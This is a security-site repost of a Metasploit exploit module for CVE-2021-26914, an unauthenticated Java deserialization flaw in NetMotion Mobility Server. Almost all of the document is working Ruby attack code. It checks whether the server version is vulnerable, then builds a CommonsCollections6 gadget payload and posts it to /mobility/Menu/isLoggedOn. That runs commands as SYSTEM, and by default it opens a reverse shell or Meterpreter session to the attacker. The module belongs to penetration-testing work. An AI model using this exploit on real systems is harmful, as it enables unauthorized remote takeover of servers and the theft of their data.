NetMotion Mobility Server MvcUtil Java Deserialization

2021.05.20
Credit: mr_me
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::JavaDeserialization include Msf::Exploit::CmdStager include Msf::Exploit::Powershell def initialize(info = {}) super( update_info( info, 'Name' => 'NetMotion Mobility Server MvcUtil Java Deserialization', 'Description' => %q{ This module exploits an unauthenticated Java deserialization in the NetMotion Mobility server's MvcUtil.valueStringToObject() method, as invoked through the /mobility/Menu/isLoggedOn endpoint, to execute code as the SYSTEM account. Mobility server versions 11.x before 11.73 and 12.x before 12.02 are vulnerable. Tested against 12.01.09045 on Windows Server 2016. }, 'Author' => [ 'mr_me', # Discovery and PoC 'wvu' # Module ], 'References' => [ ['CVE', '2021-26914'], ['URL', 'https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/'], ['URL', 'https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020'], ['URL', 'https://srcincite.io/advisories/src-2021-0007/'] ], 'DisclosureDate' => '2021-02-08', # Public disclosure 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => true, 'Targets' => [ [ 'Command', { 'Arch' => ARCH_CMD, 'Type' => :cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' } } ], [ 'Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :dropper, 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https' } } ], [ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :psh, 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https' } } ] ], 'DefaultTarget' => 2, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ IOC_IN_LOGS, # C:\Program Files\NetMotion Server\logs ARTIFACTS_ON_DISK # CmdStager ] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) ) unless (version = parse_version(res)) return CheckCode::Unknown('Failed to parse version from response.') end unless vuln_version?(version) return CheckCode::Safe("NetMotion Mobility #{version} is patched.") end CheckCode::Appears("NetMotion Mobility #{version} is unpatched.") end def parse_version(res) return unless res&.code == 200 # <img src='/images/menu_logo.png?version=12.01.09045' alt='Mobility' border='0' class='navLogo'> res.get_html_document.at('//img[@alt = "Mobility"]/@src').to_s[ %r{^/images/menu_logo\.png\?version=(?<version>[\d.]+)$}, :version # Hat tip @adfoster-r7 ] end def vuln_version?(version) @vuln_versions ||= (11.0...11.73).step(0.01) + # 11.0 through 11.72 (12.0...12.02).step(0.01) # 12.0 through 12.01 @vuln_versions.include?(version.to_f) end def exploit print_status("Executing #{payload_instance.refname} (#{target.name})") case target['Type'] when :cmd execute_command(payload.encoded) when :dropper execute_cmdstager when :psh execute_command( cmd_psh_payload( payload.encoded, payload.arch.first, remove_comspec: true ) ) end end def execute_command(cmd, _opts = {}) # XXX: %Path% is otherwise *only* C:\Program Files\NetMotion Server cmd.prepend( 'set Path=%Path%;' \ 'C:\Windows\System32' \ ';' \ 'C:\Windows\System32\WindowsPowerShell\v1.0' \ '&&' ) print_status('Triggering deserialization') vprint_status("Executing command: #{cmd}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/mobility/Menu/isLoggedOn'), 'vars_post' => { 'Mvc_x_Form_x_Name' => go_go_gadget(cmd) } ) unless res&.code == 200 && res.body == 'false' # If JSESSIONID is missing fail_with(Failure::PayloadFailed, 'Failed to trigger deserialization') end print_good('Successfully triggered deserialization') end def go_go_gadget(cmd) Rex::Text.encode_base64( Rex::Text.gzip( generate_java_deserialization_for_command( 'CommonsCollections6', 'cmd', # cmd.exe cmd ) ) ) end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top